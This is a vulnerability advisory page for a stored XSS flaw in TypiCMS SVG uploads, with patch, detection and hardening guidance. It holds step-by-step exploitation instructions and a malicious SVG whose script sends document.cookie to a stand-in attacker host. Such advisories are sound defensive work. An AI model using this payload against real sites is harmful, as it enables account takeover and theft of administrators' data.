CVE-2026-27621: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-27621 is a Stored Cross-Site Scripting (XSS) vulnerability in the file upload module of TypiCMS, a multilingual CMS built on the Laravel framework. The flaw exists because SVG files are permitted for upload with only MIME type validation, while the SVG content itself is not sanitized before being stored and served. It affects all TypiCMS Core versions prior to 12.0.5, 13.0.0–13.0.8, 14.0.0–14.0.26, 15.0.0–15.0.28, and 16.0.0–16.1.6. The vulnerability was published on February 21, 2026, and carries a CVSS v3.1 score of 5.4 (Medium) and a CVSS v4.0 score of 6.8 (Medium) (Github Advisory, TypiCMS Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), stemming from two flaws in TypiCMS\Modules\Core\Http\Requests\FileFormRequest.php and TypiCMS\Modules\Core\Services\FileUploader.php: SVG is explicitly whitelisted as an allowed MIME type, and the FileUploader service stores the SVG file without parsing or stripping dangerous elements such as <script> tags, <foreignObject>, <style>, or on* event handlers. An additional bug in the SVG parsing logic causes a 500 error when the uploaded SVG lacks a viewBox attribute, but this is trivially bypassed by including a valid viewBox in the malicious payload. When the default filesystem disk is set to public, the uploaded SVG is stored in a publicly accessible directory and can be triggered via a direct URL, requiring only that a victim (e.g., an administrator) visit the link (TypiCMS Advisory, Patch Commit).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user who accesses the malicious SVG file, including administrators. Even if session cookies are protected by the HttpOnly flag, the attacker's script can perform authenticated API requests on behalf of the victim — enabling account takeover through action forgery (e.g., creating new admin accounts, changing credentials, deleting content), sensitive data exfiltration (user lists, application settings), UI manipulation for phishing, and keystroke logging. The practical result is full application compromise for any privileged user who views the file (TypiCMS Advisory, Github Advisory).

Exploitability

A proof-of-concept (PoC) exploit is publicly available in the GitHub security advisory, demonstrating the attack with a crafted SVG file containing an embedded <script> tag (TypiCMS Advisory). Exploitation requires low privileges (file upload permission) and user interaction from a victim. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.044% (12th percentile), indicating a low near-term exploitation probability (Github Advisory).

Exploitation steps

  1. Obtain upload permissions: Log in to the TypiCMS admin panel as any user with file upload permissions (low-privilege account sufficient).
  2. Craft malicious SVG: Create a file named malicious.svg with embedded JavaScript and a viewBox attribute to bypass the parsing bug:
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <script>
    fetch('https://attacker.example.com/steal?c=' + document.cookie);
    // Or perform admin actions via authenticated XHR requests
  </script>
</svg>
  1. Upload the file: Navigate to the Files module at /admin/files and upload malicious.svg. The application accepts it due to permissive MIME type validation without content sanitization.
  2. Obtain the public URL: After upload, the application stores the file in a publicly accessible directory, typically at http://<target>/storage/files/malicious.svg.
  3. Deliver the payload: Send the public URL to a privileged user (e.g., an administrator) via email, chat, or by embedding it in application content.
  4. Achieve account compromise: When the administrator visits the URL, the embedded JavaScript executes in their browser, enabling session hijacking, credential theft, creation of new admin accounts, or exfiltration of sensitive data (TypiCMS Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from an administrator's browser to unexpected external domains shortly after accessing a TypiCMS file URL; unusual POST requests to the TypiCMS admin API (e.g., /admin/users, /admin/settings) originating from an admin session without corresponding user activity.
  • File System: Presence of SVG files in the application's public storage directory (e.g., storage/files/) containing <script> tags, on* event attributes, or <foreignObject> elements; SVG files with viewBox attributes combined with embedded JavaScript.
  • Logs: Web server access logs showing requests to /admin/files for SVG file uploads followed by accesses to the stored SVG URL from different IP addresses or user agents; application logs recording unexpected admin-level actions (user creation, password changes) not initiated through the normal UI flow.

Mitigation and workarounds

Upgrade TypiCMS Core to the patched versions: 12.0.5, 13.0.9, 14.0.27, 15.0.29, or 16.1.7 (for the 16.x branch). The fix introduces SVG content sanitization using the enshrined/svg-sanitize library in FileUploader.php, stripping dangerous elements before the file is stored (Patch Commit). If upgrading immediately is not possible, disable SVG uploads by removing svg from the allowed MIME types in FileFormRequest.php. Additional hardening measures include implementing a strict Content-Security-Policy (CSP) header to block inline script execution, and serving user-uploaded files from a separate cookie-less domain to isolate user-generated content from the main application (TypiCMS Advisory).

Community reactions

The vulnerability was reported by researcher lukasz-rybak and published by maintainer sdebacker on February 21, 2026. No significant broader media coverage or notable community commentary beyond the GitHub advisory has been identified at this time (TypiCMS Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management